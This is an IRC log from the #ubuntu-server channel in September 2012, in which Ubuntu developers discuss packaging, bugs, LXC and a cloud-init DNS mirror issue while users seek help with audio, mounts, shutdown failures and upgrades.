<Daviey> zul: done
<zul> Daviey: thanks
<zul> Daviey: im going to be start tagging bugs for cloud-archive stuff
<Daviey> zul: what is the status of nova using python-babel
<Daviey> ?
<zul> Daviey:  fixed in the bzr branch will be fixed when i upload rc2
<Daviey> zul: how was it re-added?
<zul> Daviey: not sure
<zul> i think pydist caught it
<Daviey> ah
 * zul shakes his fist at pydist
<uvirtbot> New bug: #1047432 in python-tornado (universe) "[MIR] python-tornado" [Critical,Fix released] https://launchpad.net/bugs/1047432
<Umo> Hey guys, my network interface is regognized a boot and seems to be running but it wont work until I run ifdown and ifup again
<Umo> Any suggestions?
<lfaraone|sh> jcastro_: ping
<jcastro_> lfaraone|sh, pong
<lfaraone|sh> jcastro_: any updates on the HP Cloud programme? Some of us are using it and were wondering if it is still expiring in five~ days.
<jcastro_> I have had no updates from them
<jcastro_> so assume it will go away for now, I will reping though.
<jcastro_> lfaraone|sh, I have a glimmer of hope that they just hooked us up for good. :)
<lfaraone|sh> jcastro_: hehe. "I'll let you know if I start getting billed"
<jcastro_> yeah basically.
<hallyn> didn't someone submit a bug to split virsh out of the libvirt-bin package (to separate its installation from libvirtd)?  I can't find it...
<JeroenDL> I can't get SFTP with CHROOT working. I've explained everything here: http://serverfault.com/questions/431329/user-cant-sftp-after-chroot (no answers yet). Any suggestions ?
<hallyn> stgraber: interesting, so the first line in precise that goes past the q one is [    31.971] bpp == 8 triggers bugs in spice apparently
<hallyn> did we lose a bugfix somewhere?
<Banzounet> Hi i just edited my /etc/network/interface file : "http://pastebin.com/PLRqGqVP" but it's not working :s May someone help me :( ?
<Banzounet> (I was trying to add a bridge for a vm)
<smb> Banzounet, Unfortunately not having the time to look into it but maybe the example of a transparent bridge here (https://wiki.ubuntu.com/Kernel/Reference/Xen) helps
<hallyn> jamespage: the blueprint items in your nae about hooking lxc testsuite up to jenkins - shoudl we nix that since lxc testsuite is in your UTAH tree?
<hallyn> *our* utah tree, he says as a proud team member :)
<jamespage> hallyn, nix?
<hallyn> well, delete it or mark as we wont' do (wahtever the kwyord is for that)
<hallyn> jamespage: ^
<jamespage> hallyn, yeah - postpone it until next release
<jamespage> I'm going to run a session on getting UTAH tests up and running at UDS
<hallyn> ok so utah tests will be run  by jenkins still>?
<hallyn> jamespage: i thought that getting the test into the utah tree would automatically get them run
 * jamespage sighs
<jamespage> if only....
<jamespage> it will in about 2 weeks time
<hallyn> ok :)
<jamespage> hallyn, ^^
<hallyn> i'll mark it postponed, thx
<jamespage> k
<smoser> hallyn, ping
<smoser> do you  knwo how i can pxe boot off of something other than the first nic ?
<smoser> kvm
<hallyn> smoser: nope.
<smoser> no you dont know ?
<smoser> or no
<smoser> you cannot
<hallyn> stgraber: the quantal-dvd-amd64 installer isn't giving me failsafe!
<sarnold> wouldn't that up to the BIOS of the various NICs?
<hallyn> smoser: no i don't know
<smoser> sarnold, well, i'm adding two virtio devices
<hallyn> smoser: can you get the qemu boot menu to help you with that?
<smoser> and it will only attempt to boot off the first
<stgraber> hallyn: did you try with the desktop image?
<hallyn> stgraber: used -dvd bc that's what your cmdline showed
<stgraber> hallyn: the ubuntu dvd image hasn't been built in a long long time, so probably ships the old X server
<stgraber> hallyn: yeah, but my quantal-dvd-amd64 image wasn't ubuntu, it was edubuntu
<hallyn> stgraber: d'oh!
<sarnold> smoser: ah, neither device actually exists then. :) way out of my experience, good luck. :)
<hallyn> ok, saturating my link a bit longer :)
<stgraber> :)
<hallyn> stgraber: so is that the one from daily-live, or daily?  i get so confused
<stgraber> hallyn: daily-live
<hallyn> ok, fetching
<hallyn> smoser: if you want me to play with it lemme know.  don't mean to sound dismissive :)  was just saying i don't offhand know
<uvirtbot> New bug: #1056363 in bind9 (main) "package bind9 1:9.8.1.dfsg.P1-4ubuntu0.2 failed to install/upgrade: subprocess installed pre-removal script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/1056363
<hallyn> stgraber: the installer itself didn't have low-graphics problem.  Only after reboot did i get it.  Same with you?
<stgraber> hallyn: it depends how you boot it. If you just let it boot, you're going to get the installer. If you choose "Try Ubuntu without installing" from the CD boot menu, then you'll get the failsafe dialog directly
<hallyn> stgraber: got it
<hallyn> stgraber: bug 1056381
<uvirtbot> Launchpad bug 1056381 in xserver-xorg-video-qxl "error on x startup" [High,Confirmed] https://launchpad.net/bugs/1056381
<zul> adam_g: re-added the novnc init script
<roaksoax_> zul: do you have any example of packaging using git?
<zul> roaksoax_:  ew? why?
<roaksoax_> zul: need to package openstack-resource-agents
<roaksoax_> and thjey are at github
<zul> roaksoax_: so you need to generate the source/
<roaksoax_> zul: ok...
<zul> roaksoax_: xbmc maybe
<roaksoax> zul: ok cool thanks
<allohak> hello
<allohak> anyone home?
<sarnold> allohak: irc tends to work best if you just ask questions ;) waiting for responses before asking can take a while (two mins in this case ;)
<allohak> ah
<allohak> in that case
<allohak> I am trying to debug an audio issue
<allohak> aplay only seems to work when I use it as sudo
<allohak> even though I have added my user account to "audio"
<allohak> can anyone please explain to me how I can get aplay to work as a normal user?
<allohak> my end goal is to get pulse audio working, but currently pacmd list-cards reports 0 cards
<allohak> I am running ubuntu server, and trying to get pulseaudio working. At the moment, pacmd list-cards is reporting 0 cards, and I suspect this has something to do with the fact aplay is only playing sound when I run it as sudo. I have already tried adding my user to the "audio" group.
<allohak> I am running ubuntu server, and trying to get pulseaudio working. At the moment, pacmd list-cards is reporting 0 cards, and I suspect this has something to do with the fact aplay is only playing sound when I run it as sudo. I have already tried adding my user to the "audio" group.
<allohak> I am running ubuntu server, and trying to get pulseaudio working. At the moment, pacmd list-cards is reporting 0 cards, and I suspect this has something to do with the fact aplay is only playing sound when I run it as sudo. I have already tried adding my user to the "audio" group.
<guntbert> allohak: repeating will be of no use - anyone who enters can see your questions anyway - just one question: what does a server need sound for?
<allohak> it's not actually a server, it's a robot running a server installation
<allohak> I am trying to get two way audio though the on board speakers and microphone to a front end interface using gstreamer
<allohak> this works between ubuntu-desktop installs, but I am failing at getting the sound configured on the server install
<guntbert> allohak: soory, I am of no help in this case - I don't care much for sound on my computers :)
<guntbert> *sorry
<allohak> guntbert, understood. I know it is kind of a strange request. Also, I apologise if I was spamming the channel. I was just reposting it whenever several new people would join so they could see the question. I figured anyone already here has seen it and not replied because they can't help.
<guntbert> allohak: no worries, this channel is not too busy anyway :-)
<allohak> guntbert, are you involved officially  with the server distribution?
<guntbert> allohak: not at all - just another user
<nsudo> cant delete on hfs partition on ububtu
<RoyK> how did you try?
<nsudo> move to trash
<RoyK> nsudo: erm - move to trash seems like a desktop thing
<guntbert> !crosspost | nsudo
<ubottu> nsudo: Please don't ask the same question in multiple Ubuntu channels at the same time. Many helpers are in more than one channel and it's not fair to them or the other people seeking support.
<sarnold> nsudo: you'll have to give a lot more details; hfs or hfs+? mount options? results if you just use 'rm'? error messages? warnings? permissions?
<nsudo> ok! sorry guys
<nsudo> how do i check that sarnold
<nsudo> sudo mount -t hfsplus -o force /dev/sda2 /mnt gives me a readonly
<genii-around> nsudo: Have you tried -o rw,gid=0,uid=0       ?
<uvirtbot> New bug: #1056462 in ceph (main) "The '--print' option to ceph-authtool is incorrect" [Undecided,New] https://launchpad.net/bugs/1056462
<hallyn> stgraber: all right, so it gets a bit hairy.  I'm going to put what's needed for full fix in the bug, then i guess go chat on ubuntu-release :)
<stgraber> hallyn: hehe, ok :)
<hallyn> stgraber: heh, i'm typing in xterm, and seeing 'shimano' results at the bottom.  I guess that's what smb was talking about :)
<hallyn> btw that took a lot of test builds to find a workign combination :)
<court_jester> Can I make questions about landscape usage here?
#ubuntu-server 2012-09-26
<AaronMickDee> Anyone have luck setting up a Half Life 2 server on Ubuntu Server? It's a legacy mod. It's not showing up in the Master Server list. I don't know if its a Valve problem or the OS problem.
<sarnold> AaronMickDee: my first guess is firewalling, both on the machine (check iptables or ufw) and on any NAT devices (wireless routers? routers? firewalls?) that may be between your server and the valve servers
<k4r1m> anybody has experience with AD using centrifydc?
<jvbe> using 12.04 , linux-virtual package + pvgrub kernel on ec2, can't mount root device, uuid not found, seems like LVM kernel mods are not loaded/included, is there an easy workaround ?
<uvirtbot> New bug: #1030107 in glance (main) "Glance-API and Glance-Registry Continuously Reload" [Undecided,Expired] https://launchpad.net/bugs/1030107
<cluelessperson> Hello all.
<cluelessperson> I don't understand this, something happened and my linux installation has gone to hell.  I've tried completely reinstalling but nothing fucking works anymore.
<cluelessperson> First of all.  My FRESH install of ubuntu 12.04 lts will not reboot or shutdown anymore with "sudo shutdown" "sudo reboot"
<cluelessperson> Second.  The apache2 installation is completely fucked up.
<IdleOne> Please stop cursing
<cluelessperson> Third.  MySQL is screwed up
<IdleOne> try sudo shutdown now
<cluelessperson> Fourth.  I cannot install guest additions
<SpamapS> cluelessperson: Typically when you have a set of problems that you want to get help with, its a good idea to start by gathering evidence so you can help your helpers understand.
<cluelessperson> SpamapS: Instead of shutting down.  Ubuntu Server reports a  "[FAIL]" and goes into "single user mode" as root, awaiting more commands.
<cluelessperson> This is with a fresh install.
<cluelessperson> "sudo reboot -h now" does worl
<SpamapS> cluelessperson: ok, thats a pretty difficult situation to get into. There should be a set of text before [FAIL] that explains what failed
<cluelessperson> SpamapS: I've reinstalled a number of times, and it continues to happen.
<SpamapS> cluelessperson: I can't really help you without knowing what failed.
<cluelessperson> SpamapS: My fstab configuration, which has been working for weeks, is suddenly failing to mount my shared folders, but I assume this an issue with guest additions with virtualbox, but before getting off track.
<cluelessperson> SpamapS:   "Killing all remaining processes.... [fail]"  "Will now switch to single-user mode"
<SpamapS> guest additions?
<cluelessperson> SpamapS: VirtualBox is a VirtualMachine Manager on my host machine, that seems to require a package or software "Guest Additions" to be installed in order for certain interfaces to be made.
<SpamapS> cluelessperson: the thing that does 'Killing all remaining processes....' (/etc/init.d/killprocs) doesn't switch to single user mode. thats weird.
<cluelessperson> SpamapS: I know.
<cluelessperson> SpamapS: Well, I don't know that doesn't switch, I know it's weird though.  Everything's been working fine for over a month.  I've been using this configuration.  As of two days ago, this suddenly is a disaster for me.
<cluelessperson> SpamapS: my fstab music mount is failing "could not convert "subsonic" to integer, result = 0: numerical result ouf of ra$    ?
<SpamapS> cluelessperson: can you pastebin 'ls -l /etc/rc0.d' ?
<SpamapS> cluelessperson: in the past, vmware's guest additions broke the shutdown/boot *badly*
<cluelessperson> SpamapS: That's probably what's happening here. and I'll be done with virtualbox
<cluelessperson> SpamapS: I made a snapshot of the VM before I attempted to install additions, let me double check
<cluelessperson> SpamapS: Fails.
<cluelessperson> SpamapS: But again, it could just be within virtualbox
<SpamapS> cluelessperson: ls -l /etc/rc0.d will at least rule out or confirm the same problem as vmware had
<cluelessperson> SpamapS: I should have said this earlier, but this happened just after virtualbox was updated.
<cluelessperson> SpamapS: but I also read ubuntu had a kernal update? I dunno how it all works yet.
<cluelessperson> SpamapS: I'm not even able to putty in.
<cluelessperson> SpamapS: What are you looking for?
<cluelessperson> There'sa  list of things
<cluelessperson> K09apache2, K10unattended-upgrades,README,S20sendsigs,S30urandom,S31urandom, S31umountnfs.sh,S35networking,S40umountfs,S60umountroot,S90halt
<SpamapS> cluelessperson: the order looks right
<SpamapS> cluelessperson: note that nowhere in there does 'single' appear, and none of those things run the 'runlevel' command, so thats pretty odd
<cluelessperson> SpamapS: This is a fresh install of ubuntu headless server 12.04 lts
<SpamapS> cluelessperson: I've shutdown quite a few of those.. no problems. Never in vbox tho
<cluelessperson> SpamapS: I never had a problem until last night.
<cluelessperson> then, bam, disaster
<SpamapS> you know.. ccze is really cool. Why isn't that just built in to gnome-terminal
<SpamapS> ?
<SpamapS> just like I can say in vim ":syntax on" and it highlights stuff.. I want that for the whole terminal
<YamakasY> guys is it doable to install Ubuntu on USB for KVM usage when you storage is local on disks ?
<uvirtbot> New bug: #1056643 in maas (main) "maas-dhcp does not remove existing dhcp server" [Undecided,New] https://launchpad.net/bugs/1056643
<YamakasY> how odd... grub canot be installed on a HP disk array!
<fidel> hi - i played with apt-mirror so far - but am willing to test apt-cacher or similar now. would you recommend apt-cacher or apt-cacher-ng
<cluelessperson> So ubuntu 12.04 is being an utter bitch right now under virtualbox.
<cluelessperson> not sure whose fault it is yet.
<keeguon> Hey, for any advanced UFW users out there, does anybody know if this is possible to source another file in the before.rules file?
<uvirtbot> New bug: #957957 in qemu-kvm (main) "kvm: 7767: cpu0 unhandled rdmsr: 0xc0010001" [Low,Won't fix] https://launchpad.net/bugs/957957
<fidel> ok - got apt-cacher-ng working. any experiences how much space i should have at least for that cache-dir on a long time view?
<uvirtbot> New bug: #1056756 in openssh (main) "sshd: preauth child terminated by signal 11" [Undecided,New] https://launchpad.net/bugs/1056756
<DarkSim> I have a problem with 12.04, I installed ubuntu-desktop and now I'm stuck at login screen
<patdk-lap> darksim, try #ubuntu
<patdk-lap> there is no gui support in here
<Ul_> Hello everybody! does anybody have any pointers to documentation on how to deploy Openstack in a small environment with only a couple of TB of storage? I've found http://joearnold.com/2011/06/27/swift-in-the-small/ which talks about Swift. I would be interested in recommendations how the services are to be distributed in such a small deployment. If I'm thinking of a four node cluster, would each cluster run all the services? Any
<jdstrand> keeguon: re sourcing a file> I don't think so. the ufw *.rules files are just standard iptables-restore files. you could modify /lib/ufw/ufw-init-functions to pull it in, but that file is not a configuration file and will be overwritten on upgrades
<keeguon> jdstrand: that's what I thought and it doesn't seem to be possible directly in iptables either or I am missing something, my guess is that I'm going to highlight a portion of the file using specific comments and parse them to perform the changes I want
<keeguon> thanks anyway
<uvirtbot> New bug: #1056816 in maas-enlist (main) "maas-enlist does not post subarch" [Undecided,In progress] https://launchpad.net/bugs/1056816
<acidflash> hello all
<acidflash> where can I see a list of precompiled kernel featues in ubuntu-server
<acidflash> i want to know if these 2 modules are precompiled -> "IP: advanced router" and "IP: policy routing"
<patdk-wk> in your /boot folder
<acidflash> yeah, whats in there?
<acidflash> i just see images
<patdk-wk> I see lots of config-* files
<pmatulis> file /boot/config-$(uname -r)
<acidflash> not a directory
<fidel> hi - i get hash sum mismatch while trying to install updates via my apt-cacher-ng machine
<fidel> any experience with that and what is the best thing to do at that moment? is there a defined command to clean the cache or should i do that manually?
<patdk-wk> acidflash, every kernel I have used on ubuntu has had both those turned on
<acidflash> patdk-wk: by default right?
<hallyn> stgraber: ppa:serge-hallyn/virt has packages which work for me to fix the qxl bug.
<hallyn> stgraber: i'm preetty sure the spicy window is messed up at lightdm - offset.  but after that it's fine.
<skrite> hey all
<jcastro_> lfaraone|sh, hey, did you end up doing anything interesting with the instances?
<BrixSat> Hello, i need to upgrade a ubuntu server from 10.04 to 12.04, but it seems not to do anything with apt-get dist-upgrade
<BrixSat> is it with do-release-upgrade -d
<SpamapS> BrixSat: -d is for the *dev* releas
<SpamapS> BrixSat: do-release-upgrade w/o -d is what you want
<BrixSat> ok :)
<BrixSat> just in case i made a backup :)
<BrixSat> it always complaining about "locale: Cannot set LC_CTYPE to default locale: No such file or directory"
<BrixSat> i seem not to find solution for these
<smoser> hallyn, http://paste.ubuntu.com/1228619/
<smoser> have you seen that ?
<smoser> that is on canonistack. i got a node where i was actually able to load the kvm_intel module
<smoser> (precise host, quantal guest)
<AlexO> Hey! I've difficulties to config my network between my host and virtual machine may some one help me to config it? :Â°
<hallyn> smoser: no, have not seen that.
<hallyn> smb ^
<hallyn> smoser: i'm not entirely surprised, there was a bug with newer linux kernel guests on older kernel hosts doing nested kvm.  but i thought it had been fixed.
<smb> hallyn, smoser nope
<smb> hallyn, But that bug would have prevented the module from loading
<hallyn> smoser: http://www.mail-archive.com/kvm@vger.kernel.org/msg72902.html
<smoser> right.
<smoser> previously the module would not load
<smoser> i was surprised that it loaded (most intel canonistack guests can't load the module on quantal)
<smoser> when it loaded, i assumed the host got the -updates kernel upgrade
<smoser> (which is possible)
<smoser> but then attempt to use it crashed
<hallyn> smb: ^ Avi mentions a proposed kvm kernel branch to fix it (big-real-mode) in that thread
<smb> Hm, I remember rtg to have submitted something about a regression in kvm...
<smb> KVM: VMX: Fix KVM_SET_SREGS with big real mode segments
<smb> http://bugs.launchpad.net/bugs/1045027
<uvirtbot> Launchpad bug 1045027 in linux "[regression] iPXE kills kvm with KVM: entry failed, hardware error 0x80000021" [Critical,In progress]
<hallyn> smb: thanks.  proof positive that i need herbal supplmeents to augment my memory
<smb> not sure this is the same thin (though some keywords triggered that memory). I just saw them asking for feedback about some regression on the stable mailing list.
<smoser> smb, or hallyn you want me to open a bug on that ?
<smoser> i can let either of you poke at the guest
<smoser> but i have no access or info to the host other than i suppose its running some 12.04 kernel
<hallyn> smoser: yes, please.  i do think it's a dup of the one smb mentioned, but it can always be marked as such later
<smoser> oh.
<smoser> ididnt' see that.
<smoser> its quite possible and/or likely
<smoser> interestingly, i did not se ethis yesterday
<smoser> on quantal amd64 nested virt
<smoser> hallyn, it would sure seem like a dupe though
<smoser> so i'm not going to bother opening
<hallyn> smoser: ok
<ironm> hello. Is there a recommended directory (unbuntu-server 12.04) for installation  of JBoss AS7 or glassfish? I have used just for testing /root ...
<ironm> thank you in advance for any hints.
<sarnold> ironm: probably /opt/something, if it isn't packaged to live in /usr with other applications....
<sarnold> ironm: check linux filesystem heirarchy (spelling?) on google..
<ironm> sarnold, thank you very much for your advice. no .. it is not a package ... just a .zip file you can unzip anywhere
<sarnold> ironm: ah. hrm. that's odd.
<sarnold> ignore me then :)
<ironm> sarnold, I will use /usr/lib ... where you can find different softoware like java, postgresql etc ...
<yeming> I setup MAAS and have 2 nodes ready. But I cannot login to them using 'ssh ubunt@node', although I have uploaded ssh key to MAAS. Tried several times install/reinstall, doesn't help. Does anyone have an idea?
<SpamapS> utlemming: when will we be doing new 12.04 cloud images?
<SpamapS> utlemming: already up to 50MB of packages to d/l
<utlemming> SpamapS: tomorrow....waiting on the Grub2 SRU
<RoyK> any idea if canonical is planning extended support for server distros?
<RoyK> in some cases, it'd be nice to have >5Y support
<uvirtbot> New bug: #1057054 in multipath-tools (main) "poor performance after upgrade to Precise" [Undecided,New] https://launchpad.net/bugs/1057054
<SpamapS> Sep 26 17:44:12 clint-local-ci-u1-0 [CLOUDINIT] cc_apt_update_upgrade.py[DEBUG]: selected mirror at: http://ubuntu-mirror.localdomain/ubuntu
<SpamapS> hrm..
<SpamapS> *ugh
<SpamapS> smoser: the logic that cloud-init uses to find if a mirror is resolvable is vulnerable to eeevil DNS
<SpamapS> which my stupid cable provider has
<smoser> SpamapS, fixed in quantal
<smoser> cloud-init selects wrong mirror with dns server redirection Edit
<smoser>     Ubuntu
<smoser>     âcloud-initâ package
<smoser>     Bugs
<smoser>     Bug #974509
<smoser> Reported by Chuck Short on 2012-04-05
<uvirtbot> Launchpad bug 974509 in cloud-init "cloud-init selects wrong mirror with dns server redirection" [Medium,Fix committed] https://launchpad.net/bugs/974509
<smoser> 30
<smoser> This bug affects 4 people. Does this bug affect you? Edit
<smoser> Affects 	Status 	Importance 	Assigned to 	Milestone
<smoser> â 	
<smoser> â cloud-init Remove
<zul> uh oh
<smoser> 	
<smoser> Fix Committed
<smoser> 	
<smoser> Medium
<SpamapS> paste more!
<smoser> 	
<SpamapS> MORE!
<smoser> â Unassigned
<SpamapS> MOAR!
<smoser> 	
<smoser> â 	cloud-init (Ubuntu) Remove 	
<smoser> Fix Released
<smoser> 	
 * SpamapS hoots
<smoser> Low
<smoser> 	
<smoser> â Unassigned
<smoser> 	
<smoser> Target to milestone
<RoyK> smoser: wtf?
<smoser> â 	Precise Remove 	
<smoser> Triaged
<SpamapS> choooochoooooo
<smoser> 	
<SpamapS> go smoser go
<smoser> Medium
<smoser> 	
<smoser> â Scott Moser
<smoser> 	
<smoser> Target to milestone
<smoser> Also affects project (?) Also affects distribution Nominate for series
<smoser> Edit
<smoser> Bug Description
<smoser> Hi,
<smoser> I have Rogers as an ISP in the great white north, and use their DNS servers. However they run DNS redirectors so that when you get a bad domain then it does bogus things to the hostname. Anyways this resolves in unresovalble hosts in my /etc/apt/sou
<SpamapS> OMG
<smoser> whoops
<smoser> https://bugs.launchpad.net/ubuntu/+source/cloud-init/+bug/974509
<uvirtbot> Launchpad bug 974509 in cloud-init "cloud-init selects wrong mirror with dns server redirection" [Medium,Fix committed]
<SpamapS> don't we have bots for this?
<RoyK> apparently not
<smoser> you all suck
<smoser> and if you keep complaining, i've got all sorts more text i can paste here!
<RoyK> smoser: but not you, sweetheart? ;)
<smoser> but anyway, SpamapS that is fixed in quantal, and should be SRU'd
<SpamapS> smoser: sweet. For now I just changed my DNS server to something sane
<RoyK> IMO if it's a security issue, perhaps fixing it in LTS would be a good idea?
<SpamapS> security? Not sure about that
<SpamapS> If you are letting your ISP do stuSep 26 17:44:12 clint-local-ci-u1-0 [CLOUDINIT] cc_apt_update_upgrade.py[DEBUG]: selected mirror at: http://ubuntu-mirror.localdomain/ubuntu
<SpamapS> doh
 * SpamapS also can't work the paste command
<smoser> it will get fixed. and it was raised as a security issue too.
<SpamapS> how so?
<RoyK> seems spamming smoser flooded everything, so it's a bit hard to read it all
<smoser> but realistically... if you're in a "cloud" and you can't trust your dns server...
<SpamapS> if your DNS is insecure, how can c-i protect you?
<smoser> https://bugs.launchpad.net/cloud-init/+bug/1040200
<RoyK> sorry, seems I jumped to conclusions
<SpamapS> smoser: tho actually relying on DNS alone to pick the mirror does mean somebody can prvent you from installing updates just by DNS spoofing ubuntu-mirror...
<SpamapS> 1040200 does not exist
<RoyK> use a secure DNS server
<SpamapS> or its private
<smoser> private
<SpamapS> RoyK: no such thing really
<RoyK> no, not really
<SpamapS> UDP and caching means DNS is just not trustworthy ever
<RoyK> just use tcp, then, most dns servers run on tcp these days
<SpamapS> thats no fix
<SpamapS> barely helps actually
<SpamapS> RoyK: you have to verify whatever DNS has sent you to
<smoser> well, the long term fix is dnssec
<SpamapS> smoser: not sure I agree with the fix for this either. Its nice that you detected redirection in the naive sense, but it seems like the right way to go is to verify that the mirror has a valid signed set of distro metadata on it
 * koolhead17 wakes up
<smoser> SpamapS, that can be plugged in.
<smoser> and you're welcome to add that.
<smoser> :)
<hallyn> ppetraki: do you have a working git url for multipath-tools?
<ppetraki> hallyn, yes, The suse guy runs it now
<ppetraki> hallyn, git://git.kernel.org/pub/scm/linux/storage/multipath/hare/multipath-tools.git
 * ppetraki be nice if we had a bzr branch that auto pulled this
<hallyn> ppetraki: if you'll be at uds we could spend an hour tryin gto set upa  daily build recipe for multipath (including bzr branch pulling from git)
<hallyn> thx, got the tree :)
<ppetraki> hallyn, will be remote, but I can make time either way
<ppetraki> hallyn, It's been a brisk week in storage actually
<shantorn> mb downloads makes things go fast
<hallyn> ppetraki: oh?
<ppetraki> hallyn, yeah, did some triage on a slow SSD reset, a Dell SAN "multipath too slow" bug just came in (and he cited my docs!), discovered a bug in the docs (#1057071 , branch attached pls commit), and been helping this dude on linux-scsi with his SES enclosure, in the process learned a whole bunch of new stuff
<SpamapS> hallyn: with the default lxc networking, is there a way to programatically query things like the host address?
<hallyn> ppetraki: can you do a merge request on https://code.launchpad.net/~peter-petrakis/ubuntu/precise/ubuntu-core-doc/serverguide-bug-1057071 ?  (probably list pmatulis as the reviewer)
<SpamapS> hallyn: seems hard coded in /etc/init/lxc-net.conf
<hallyn> SpamapS: as in, get the host address from inside the container?
<SpamapS> hallyn: no, as in from the host
<SpamapS> hallyn: we're moving juju to use lxc's networking instead of libvirt's
<SpamapS> hallyn: but that loses the ability to say "what is the host address?" that libvirt has
<hallyn> you mean like eth0 or wlan0 address?
<hallyn> why do you want it?  what are you trying to do?  and how do you get it in libvirt?
<SpamapS> I run services on the host
<hallyn> stgraber: ^ maybe you understand SpamapS' question/intent?
<SpamapS> the containers have to contact them
<hallyn> can you pass it in with cloudinit userdata file?
<SpamapS> yes thats how its being passed in
<hallyn> ok
<SpamapS> right now it is accidentally working w/ the libvirt 192.168.122.1 address :-P
<stgraber> SpamapS: not sure I understand the question. If you want the host IP address, just use the container's gateway?
<hallyn> stgraber: well that won't *always* work for everyone, but in their case i think it always will
<SpamapS> how we get it now:     output = subprocess.check_output(
<SpamapS>         ["virsh", "net-dumpxml", name], env={"LC_ALL": "C"})
<ppetraki> hallyn, it's not mergeable?
<hallyn> SpamapS: so you want the address of lxcbr0?  the answer i think is 'use ip', but that's probably not the q
<SpamapS> stgraber: so I have to decypher it from the configuration which ends up on the container? :-/
<hallyn> ppetraki: you have to do a merge request.  I can't merge it
<SpamapS> hallyn: that is actually ok if that works
<SpamapS> I'll try that
<stgraber> SpamapS: ah, if that's on the host, just look at lxcbr0 or source /etc/default/lxc and use LXC_ADDR from there
<hallyn> SpamapS: well how much control do *you* have over the host?
<SpamapS> hallyn: from juju? Very little.
<hallyn> SpamapS: oh, i thought you fully controlled how the continers and lxc were setup
<hallyn> i.e., you could create your own lxcbr1 if you wanted
<SpamapS> I have sudo for lxc-* but I'd rather not extend that requirement much further
<hallyn> jujubr0
<SpamapS> Yeah I could do that
 * SpamapS has to step away and will look at doing that too
<hallyn> SpamapS: if you don't wnat to use root much, it may not be the way to go
<ppetraki> hallyn, http://pastebin.ubuntu.com/1229023/
<hallyn> ppetraki: jinkeys, i don't know what that means
<ppetraki> hallyn, even the original branch doesn't know it's stacked on serverguide/precise, according to lp.net
<hallyn> ppetraki: what if you 'bzr push lp:~peter-petrakis/serverguide/lp-1057071' then bzr lp-open ?
<hallyn> if that doesn't work for you, it seems to be working for me.  I can do a merge request from lp:~serge-hallyn/serverguide/lp-1057071 (it seems).
<ppetraki> hallyn, you know, it might be a group thing
<ppetraki> hallyn, it's always done this
<hallyn> ppetraki: ok, i'll just go ahead and propose merge from mine, and bounce any feedback back to you?
<ppetraki> hallyn, sure it creates a new branch, but its not stacked
<ppetraki> hallyn, that would be great
<hallyn> ppetraki: https://code.launchpad.net/~serge-hallyn/serverguide/lp-1057071/+merge/126527
<hallyn> ppetraki: i assume we'll also want it to be applied to lp:serverguide?  (it's past string freeze for quantal though)
<ppetraki> hallyn, yeah, broken there too, SRUs all around :)
<ppetraki> hallyn, hour turn around time, not bad :) https://bugs.launchpad.net/ubuntu/+source/multipath-tools/+bug/1057054
<uvirtbot> Launchpad bug 1057054 in multipath-tools "poor performance after upgrade to Precise" [Undecided,Invalid]
<hallyn> pmatulis: when you get a chance, could you look at https://code.launchpad.net/~serge-hallyn/serverguide/lp-1057071/+merge/126527 ?
<hallyn> stgraber: i'm waiting for feedback from you on bug 1056381 - lemme know if i shouldnt' be.
<uvirtbot> Launchpad bug 1056381 in xserver-xorg-video-qxl "error on x startup" [High,Confirmed] https://launchpad.net/bugs/1056381
<uvirtbot> New bug: #1057098 in openvswitch (main) "[FFe] Please update to 1.4.3" [Undecided,New] https://launchpad.net/bugs/1057098
<stgraber> hallyn: busy with other things, if I get to it this week, it's going to be on Friday
<uvirtbot> New bug: #1057100 in postfix (main) "Failed to install postfix during server install without network" [Undecided,New] https://launchpad.net/bugs/1057100
<hallyn> stgraber: friday is coming up quick :)  np, thanks
<uvirtbot> New bug: #1057111 in tomcat6 (universe) "Sync tomcat6 6.0.35-5 (universe) from Debian unstable (main)" [Undecided,New] https://launchpad.net/bugs/1057111
<adam_g> zul: did you upload a new nova?
<zul> adam_g: yeah
<zul> rc3 was out this morning
<zul> adam_g: its still waiting to be approved by the archive admin
<adam_g> zul: okay, just wanted to set a requirement on the newer sqlalchemy.
<zul> k cool
<adam_g> zul: ill apply it to branches and it'll make it next time
<allohak> when I do an 'ls -l' what does the '+' mean at the end of crw-rw---T+
<allohak> I'm having trouble googling it
<guntbert> allohak: see http://www.linuxquestions.org/linux/answers/security/acls_extended_filepermissions  (search for acl)
<allohak> guntbert: thanks, I'm reading through it now
<guntbert> allohak: You're welcome
<jMCg> Hello happy people o/~
<sarnold> allohak: btw, symbolhound is way better than google at searching for punctuation marks
<jMCg> I'm having trouble restoring a partition from its LVM snapshot:
<jMCg> http://dpaste.com/806508/
<allohak> sarnold: i've never heard of symbolhound, I'll check it out
<sarnold> allohak: http://symbolhound.com/?q=ls+-l+%2B
<sarnold> allohak: on that listing, probably the one "How do I create a file..." near the bottom is probably the best.
<sarnold> (not better than the source you've already got! that looks better based on the URL alone; but as a general, hey, symbolhound can help you with problems that otherwise look unsolvable, it's a useful tool.)
<allohak> sarnold: interesting, this looks like it will be useful to me in the future actually. I'm a grad student so I often end up with some strange google queries that don't work terribly well because they contain crap like this
<sarnold> allohak: exactly :)
<smoser> stgraber, if i click on 'Hello smoser' on http://iso.qa.ubuntu.com/
<smoser> it tells me "Access denied"
#ubuntu-server 2012-09-27
<ianp_> Does anyone here work with Java apps?  seems like there are packages for things like jboss and activemq, but they are all hooked up to (have dependencies on) the open source JDK rather than Oracles
<ianp_> do people in the real world actually use openjdk for these apps?
<ianp_> or can i ignore the fact that things like gcj are dependencies of them?
<smoser> kirkland, ping
<smoser> bigjools, was having issues copy and pasting within byobu.
<smoser> it was about to get ugly, so i figured i'd ask you
<smoser> :)
<bigjools> o/ kirkland
<bigjools> heh
<SpamapS> ianp_: thats because oracle's JDK is not re-distributable
<ffunenga> Hello everyone, I have an idea about a webpage where people would publish things they want to sell or rent but the problem is in the insert into of the database
<ffunenga> how is this type of thing normally solved? do I have to approve every post? or I record the IPs of the last 5 mins and only let users post from 5 to 5 mins?
<SpamapS> ffunenga: there are a TON of systems and that is often how those sites differentiate themselves
<ffunenga> SpamapS: can you point me to one please?
<sarnold> craigslist and ebay spring to mind quickly ;)
<ffunenga> sarnold: no... I'm talking about the system to prevent database flooding
<ffunenga> or equivalent types of attack
<ffunenga> is the last 5 minutes the best idea?
<sarnold> ffunenga: trivially vulnerable to spammers who write once every six minutes
<sarnold> or have access to botnet of thousands..
<SpamapS> ffunenga: the point is, this is how websites make their money
<SpamapS> ffunenga: so its not likely that you'll find many ready-made systems for this
